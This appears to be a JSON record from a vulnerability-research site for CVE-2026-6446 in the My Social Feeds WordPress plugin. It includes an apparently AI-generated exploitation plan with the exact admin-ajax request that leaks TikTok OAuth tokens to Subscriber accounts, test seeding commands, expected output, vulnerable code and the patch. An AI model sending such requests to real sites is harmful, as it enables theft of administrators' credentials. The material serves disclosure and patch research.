[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fANyFmY2dIudf1vcLPN7oWxXXDB7x83DmVG5PBOmcGqU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-6446","my-social-feeds-missing-authorization-to-unauthenticated-sensitive-information-exposure-via-ttpgetaccounts-ajax-action","My Social Feeds \u003C= 1.0.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'ttp_get_accounts' AJAX Action","The My Social Feeds – Social Feeds Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 1.0.4 via the 'ttp_get_accounts' AJAX action. This is due to the complete absence of authorization checks (no capability verification) and nonce verification in the get_accounts() function, which returns the full contents of the 'ttp_tiktok_accounts' WordPress option. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive TikTok OAuth credentials, including access_token and refresh_token values, that belong to administrator-connected TikTok accounts, enabling them to impersonate the site owner when interacting with the TikTok API.","my-social-feeds",null,"\u003C=1.0.4","1.0.5","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Insufficiently Protected Credentials","2026-05-01 00:00:00","2026-05-02 04:27:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd46d6493-8b89-4258-9d83-79e5946cd76f?source=api-prod",1,[22,23,24,25,26,27,28,29],"build\u002Fadmin-dashboard.asset.php","build\u002Fadmin-dashboard.js","build\u002Ftiktok-player\u002Findex.asset.php","build\u002Ftiktok-player\u002Findex.js","build\u002Ftiktok-player\u002Fview.asset.php","build\u002Ftiktok-player\u002Fview.js","includes\u002FTiktokAPI.php","languages\u002Fmy-social-feeds-en_US.po","researched",false,3,"# Exploitation Research Plan - CVE-2026-6446\n\n## 1. Vulnerability Summary\nThe **My Social Feeds** plugin (up to version 1.0.4) contains a sensitive information exposure vulnerability via its AJAX handler for the `ttp_get_accounts` action. The `get_accounts()` function in the `TTPTiktokAPI` class lacks both capability checks (`current_user_can`) and nonce verification (`check_ajax_referer`). This allows any authenticated user, including those with **Subscriber** privileges, to retrieve the full contents of the `ttp_tiktok_accounts` WordPress option, which contains TikTok OAuth credentials (`access_token`, `refresh_token`, and `open_id`).\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `ttp_get_accounts`\n- **HTTP Method**: `POST` or `GET` (AJAX actions typically support both, but `POST` is standard).\n- **Authentication**: Required (Subscriber level or higher).\n- **Vulnerable Parameter**: None (the action itself triggers the data dump).\n- **Payload**: `action=ttp_get_accounts`\n\n## 3. Code Flow\n1. **Entry Point**: The plugin registers the AJAX action in `includes\u002FTiktokAPI.php`:\n   ```php\n   add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);\n   ```\n   *Note: There is no corresponding `wp_ajax_nopriv_ttp_get_accounts`, confirming authentication is required.*\n2. **Sink**: The `get_accounts()` function (located in `includes\u002FTiktokAPI.php` at approximately line 156) is called.\n3. **Execution**: In the vulnerable version (1.0.4), the function likely reads the option and returns it directly:\n   ```php\n   public function get_accounts() {\n       \u002F\u002F Vulnerable version lacks: if (!current_user_can('manage_options')) return;\n       \u002F\u002F Vulnerable version lacks: check_ajax_referer('...', '...');\n       $accounts = get_option('ttp_tiktok_accounts', []);\n       wp_send_json_success($accounts);\n   }\n   ```\n4. **Data Leak**: The `ttp_tiktok_accounts` option stores an associative array where keys are TikTok `open_id`s and values include `access_token` and `refresh_token`.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `get_accounts()` function **completely lacks nonce verification**. Therefore, no nonce is required to exploit this endpoint. \n\nIf testing reveals a nonce is required (i.e., the description was inaccurate), the nonce would typically be generated in `build\u002Fadmin-dashboard.js` and localized. However, based on the `PR:L` severity and the \"Missing Authorization\" description, the exploit should succeed with just a valid Subscriber session.\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan:\n1. **Authentication**: Log in as a Subscriber-level user to obtain a session cookie.\n2. **Execution**: Send a `POST` request to `admin-ajax.php` with the `action` parameter set to `ttp_get_accounts`.\n3. **Capture**: Parse the JSON response to extract TikTok credentials.\n\n### Required HTTP Request:\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Subscriber Cookies]\n\naction=ttp_get_accounts\n```\n\n## 6. Test Data Setup\nTo verify the leak, mock data must exist in the database. Use WP-CLI to seed the sensitive option:\n\n```bash\n# Seed the TikTok accounts option with dummy sensitive data\nwp option update ttp_tiktok_accounts '{\n    \"test_open_id_123\": {\n        \"account_id\": \"test_open_id_123\",\n        \"display_name\": \"Attacker Target\",\n        \"access_token\": \"SENSITIVE_ACCESS_TOKEN_XYZ_999\",\n        \"refresh_token\": \"SENSITIVE_REFRESH_TOKEN_ABC_111\",\n        \"expires_at\": 1999999999\n    }\n}' --format=json\n```\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON body:\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"test_open_id_123\": {\n            \"account_id\": \"test_open_id_123\",\n            \"display_name\": \"Attacker Target\",\n            \"access_token\": \"SENSITIVE_ACCESS_TOKEN_XYZ_999\",\n            \"refresh_token\": \"SENSITIVE_REFRESH_TOKEN_ABC_111\",\n            \"expires_at\": 1999999999\n        }\n    }\n}\n```\n\n## 8. Verification Steps\n1. **Observe Output**: Verify the returned JSON contains the `access_token` and `refresh_token` seeded in Step 6.\n2. **Access Control Check**: Attempt the same request without a cookie to ensure `wp_ajax_` correctly blocks unauthenticated requests (returning `400` or `0`).\n3. **Privilege Check**: Confirm the user used for exploitation has only the `subscriber` role:\n   ```bash\n   wp user get \u003Cusername> --field=roles\n   ```\n\n## 9. Alternative Approaches\nIf the `ttp_get_accounts` endpoint is somehow blocked, examine `ttp_tiktok_videos` (registered for `nopriv`):\n```php\nadd_action('wp_ajax_ttp_tiktok_videos', [$this, 'get_videos']);\nadd_action('wp_ajax_nopriv_ttp_tiktok_videos', [$this, 'get_videos']);\n```\nCheck if `get_videos` leaks the account info in its response or through error messages if an invalid `open_id` is provided. However, `get_accounts` is the primary and direct target for this CVE.","The My Social Feeds plugin for WordPress is vulnerable to sensitive information exposure due to a missing authorization check on its 'ttp_get_accounts' AJAX action. Authenticated attackers, including those with Subscriber-level privileges, can exploit this to retrieve sensitive TikTok OAuth tokens (access and refresh tokens) stored in the WordPress options table.","\u002F\u002F includes\u002FTiktokAPI.php\n\n\u002F\u002F Line 25\nadd_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);\n\n\u002F\u002F ...\n\n\u002F\u002F Line 156\npublic function get_accounts() {\n    $accounts = get_option('ttp_tiktok_accounts', []);\n    wp_send_json_success($accounts);\n}","--- includes\u002FTiktokAPI.php\n+++ includes\u002FTiktokAPI.php\n@@ -156,5 +156,8 @@\n \n     public function get_accounts() {\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+            wp_send_json_error( 'Unauthorized' );\n+        }\n         $accounts = get_option('ttp_tiktok_accounts', []);\n         wp_send_json_success($accounts);\n     }","To exploit this vulnerability, an attacker needs a valid login session on the WordPress site (Subscriber level or higher). The attacker sends a request to the \u002Fwp-admin\u002Fadmin-ajax.php endpoint with the action parameter set to 'ttp_get_accounts'. Because the plugin fails to verify user capabilities or nonces for this action, it returns the full contents of the 'ttp_tiktok_accounts' option, which includes sensitive TikTok OAuth credentials (access_token, refresh_token, and open_id) belonging to the site administrator.","gemini-3-flash-preview","2026-05-04 17:37:06","2026-05-04 17:37:37",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmy-social-feeds\u002Ftags\u002F1.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmy-social-feeds\u002Ftags\u002F1.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmy-social-feeds\u002Ftags"]